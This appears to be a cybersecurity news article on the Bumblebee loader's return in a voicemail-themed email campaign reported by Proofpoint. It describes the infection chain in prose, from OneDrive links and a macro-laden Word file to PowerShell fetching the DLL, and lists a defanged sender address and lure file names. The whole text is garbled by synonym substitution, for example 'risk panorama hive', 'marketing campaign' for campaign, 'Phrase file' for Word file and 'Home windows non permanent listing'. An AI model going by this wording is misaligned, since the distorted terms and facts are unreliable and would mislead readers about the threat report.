The delicate Bumblebee loader is again within the risk panorama hive after a four-month hiatus, with a brand new e-mail marketing campaign focusing on hundreds of organizations within the US.
Bumblebee, an preliminary entry loader utilized by a number of cybercriminal teams to drop varied payloads like infostealers, banking Trojans, and post-compromise instruments, first appeared on the scene in March 2022. Till final October, risk actors relied on it closely as a well-liked malware loader — after which it disappeared from researchers’ radar.
The loader was again in a marketing campaign noticed this month by the Proofpoint Risk Analysis Workforce, in accordance to a weblog publish revealed Tuesday. The marketing campaign employs a number of thousand emails with the topic “Voicemail February,” despatched from the sender “data@quarlesaa[.]com” and containing malicious Microsoft OneDrive URLs.
These URLs result in a Phrase file with names akin to “ReleaseEvans#96.docm” that spoof the patron electronics firm Humane. The assault vector ultimately makes use of a PowerShell command to obtain and run a Bumblebee DLL file as an entry to additional malicious exercise, the researchers discovered.
The return of the loader is a harbinger of issues to return, Proofpoint researchers famous, because it “aligns with a surge of cybercriminal risk exercise after a notable absence of many risk actors and malware.”
2024 “has began off with a bang for cybercriminal risk actors, with exercise returning to very excessive ranges after a short lived winter lull,” the researchers stated. “Proofpoint researchers proceed to watch new, artistic assault chains, makes an attempt to bypass detections, and up to date malware from many risk actors and unattributed risk clusters,” including that they anticipate this flurry of exercise to proceed till summer season.
Different malicious teams returning to motion after a break embody teams that the researchers monitor as post-exploitation operator TA582; aviation and aerospace-targeting actor TA2541; and e-mail campaigns delivered by TA571 that ship the DarkGate malware, amongst others.
Bumblebee Malware’s New and Noteworthy Flight Path
There are a few key points of the marketing campaign that set it aside from earlier assaults utilizing Bumblebee. As an illustration, the marketing campaign makes use of VBA macro-enabled paperwork, a tactic that is hardly ever used lately by risk actors since Microsoft started blocking macros by default in 2022 to thwart malicious exercise, the researchers stated.
In the newest marketing campaign, the Phrase doc used macros to create a script within the Home windows non permanent listing, which the macro then executed by utilizing the “wscript” utility. Contained in the dropped non permanent file was a PowerShell command that downloaded and executed the subsequent stage from a distant server, saved in a file known as “update_ver.” The subsequent stage was one other PowerShell command, which in flip downloaded and ran the Bumblebee DLL.
Curiously, the assault chains utilized in Bumblebee’s pre-hiatus campaigns have been considerably completely different, the researchers famous. Earlier campaigns despatched emails that contained URLs resulting in the obtain of a DLL which, if executed, began Bumblebee; or the emails contained HTML attachments that leveraged HTML smuggling to drop a RAR file that, if executed, exploited the WinRAR flaw CVE-2023-38831 to put in Bumblebee.
Different earlier Bumblebee campaigns leveraged emails with zipped, password-protected VBS attachments which, if executed, used PowerShell to obtain and execute the loader, or emails that contained zipped LNK information to obtain an executable file that began Bumblebee.
“Out of the almost 230 Bumblebee campaigns recognized since March 2022, solely 5 used any macro-laden content material; 4 campaigns used XL4 macros, and one used VBA macros,” in response to the researchers.
Defenders Beware
Whereas Proofpoint has not attributed the current Bumblebee marketing campaign to any tracked risk actor — although using OneDrive URLs and sender deal with seem to align with earlier TA579 actions. Nevertheless, the agency included an inventory of indicators of compromise (IoC) to help threat-hunting.
The researchers additionally urged organizations to be on alert for the malicious e-mail marketing campaign hallmarks famous above, and stated that they’ve assessed with “excessive confidence” that Bumblebee is getting used “as an preliminary entry facilitator to ship follow-on payloads akin to ransomware.”
Organizations also can make use of primary safety finest practices to keep away from compromise by malicious e-mail campaigns, akin to conducting worker coaching to assist folks establish phishing and different focused scams, and implementing e-mail security-scanning software program that flags suspicious messages earlier than they attain worker inboxes.